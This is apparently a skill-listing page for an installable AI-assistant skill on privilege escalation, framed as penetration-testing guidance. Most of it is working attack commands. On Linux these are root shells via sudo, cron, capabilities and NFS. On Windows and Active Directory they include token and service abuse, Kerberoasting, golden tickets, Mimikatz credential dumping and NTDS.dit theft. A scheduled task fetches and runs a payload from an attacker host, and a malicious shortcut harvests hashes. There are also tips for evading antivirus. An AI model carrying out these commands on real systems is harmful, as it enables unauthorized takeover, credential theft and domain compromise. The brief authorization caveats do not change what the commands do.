Privilege Escalation Methods

This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "Privilege Escalation Methods" with this command: npx skills add zebbern/claude-code-guide/zebbern-claude-code-guide-privilege-escalation-methods

Privilege Escalation Methods

Purpose

Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.

Inputs/Prerequisites

  • Initial low-privilege shell access on target system
  • Kali Linux or penetration testing distribution
  • Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
  • Understanding of Windows/Linux privilege models
  • For AD attacks: Domain user credentials and network access to DC

Outputs/Deliverables

  • Root or Administrator shell access
  • Extracted credentials and hashes
  • Persistent access mechanisms
  • Domain compromise (for AD environments)

Core Techniques

Linux Privilege Escalation

1. Abusing Sudo Binaries

Exploit misconfigured sudo permissions using GTFOBins techniques:

# Check sudo permissions
sudo -l

# Exploit common binaries
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts    # then type: !bash
sudo man man            # then type: !bash
sudo env /bin/bash

2. Abusing Scheduled Tasks (Cron)

# Find writable cron scripts
ls -la /etc/cron*
cat /etc/crontab

# Inject payload into writable script
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh

# Wait for execution, then:
/bin/bash -p

3. Abusing Capabilities

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Python with cap_setuid
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Perl with cap_setuid
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

# Tar with cap_dac_read_search (read any file)
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar

4. NFS Root Squashing

# Check for NFS shares
showmount -e <victim_ip>

# Mount and exploit no_root_squash
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash

5. MySQL Running as Root

# If MySQL runs as root
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p

Windows Privilege Escalation

1. Token Impersonation

# Using SweetPotato (SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe

# Using SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

2. Service Abuse

# Using PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

3. Abusing SeBackupPrivilege

import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

4. Abusing SeLoadDriverPrivilege

# Load vulnerable Capcom driver
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe

5. Abusing GPO

.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
  --Author DOMAIN\<USER> --Command "cmd.exe" `
  --Arguments "/c net user Administrator Password!@# /domain" `
  --GPOName "ADDITIONAL DC CONFIGURATION"

Active Directory Attacks

1. Kerberoasting

# Using Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request

# Using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt

2. AS-REP Roasting

.\Rubeus.exe asreproast

3. Golden Ticket

# DCSync to get krbtgt hash
mimikatz# lsadump::dcsync /user:krbtgt

# Create golden ticket
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500

4. Pass-the-Ticket

.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
klist  # Verify ticket

5. Golden Ticket with Scheduled Tasks

# 1. Elevate and dump credentials
mimikatz# token::elevate
mimikatz# vault::cred /patch
mimikatz# lsadump::lsa /patch

# 2. Create golden ticket
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi

# 3. Create scheduled task
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
  /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
schtasks /run /s DOMAIN /TN "enterprise"

Credential Harvesting

LLMNR Poisoning

# Start Responder
responder -I eth1 -v

# Create malicious shortcut (Book.url)
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico

NTLM Relay

responder -I eth1 -v
ntlmrelayx.py -tf targets.txt -smb2support

Dumping with VSS

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

Quick Reference

TechniqueOSDomain RequiredTool
Sudo Binary AbuseLinuxNoGTFOBins
Cron Job ExploitLinuxNoManual
Capability AbuseLinuxNogetcap
NFS no_root_squashLinuxNomount
Token ImpersonationWindowsNoSweetPotato
Service AbuseWindowsNoPowerUp
KerberoastingWindowsYesRubeus/Impacket
AS-REP RoastingWindowsYesRubeus
Golden TicketWindowsYesMimikatz
Pass-the-TicketWindowsYesRubeus
DCSyncWindowsYesMimikatz
LLMNR PoisoningWindowsYesResponder

Constraints

Must:

  • Have initial shell access before attempting escalation
  • Verify target OS and environment before selecting technique
  • Use appropriate tool for domain vs local escalation

Must Not:

  • Attempt techniques on production systems without authorization
  • Leave persistence mechanisms without client approval
  • Ignore detection mechanisms (EDR, SIEM)

Should:

  • Enumerate thoroughly before exploitation
  • Document all successful escalation paths
  • Clean up artifacts after engagement

Examples

Example 1: Linux Sudo to Root

# Check sudo permissions
$ sudo -l
User www-data may run the following commands:
    (root) NOPASSWD: /usr/bin/vim

# Exploit vim
$ sudo vim -c ':!/bin/bash'
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)

Example 2: Windows Kerberoasting

# Request service tickets
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# Crack with hashcat
$ hashcat -m 13100 hashes.txt rockyou.txt

Troubleshooting

IssueSolution
sudo -l requires passwordTry other enumeration (SUID, cron, capabilities)
Mimikatz blocked by AVUse Invoke-Mimikatz or SafetyKatz
Kerberoasting returns no hashesCheck for service accounts with SPNs
Token impersonation failsVerify SeImpersonatePrivilege is present
NFS mount failsCheck NFS version compatibility (vers=2,3,4)

Additional Resources

For detailed enumeration scripts, use:

  • LinPEAS: Linux privilege escalation enumeration
  • WinPEAS: Windows privilege escalation enumeration
  • BloodHound: Active Directory attack path mapping
  • GTFOBins: Unix binary exploitation reference

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Related Skills

Related by shared tags or category signals.

Coding

sql injection testing

No summary provided by upstream source.

Repository SourceNeeds Review
Coding

top 100 web vulnerabilities reference

No summary provided by upstream source.

Repository SourceNeeds Review
Coding

linux production shell scripts

No summary provided by upstream source.

Repository SourceNeeds Review
Coding

active directory attacks

No summary provided by upstream source.

Repository SourceNeeds Review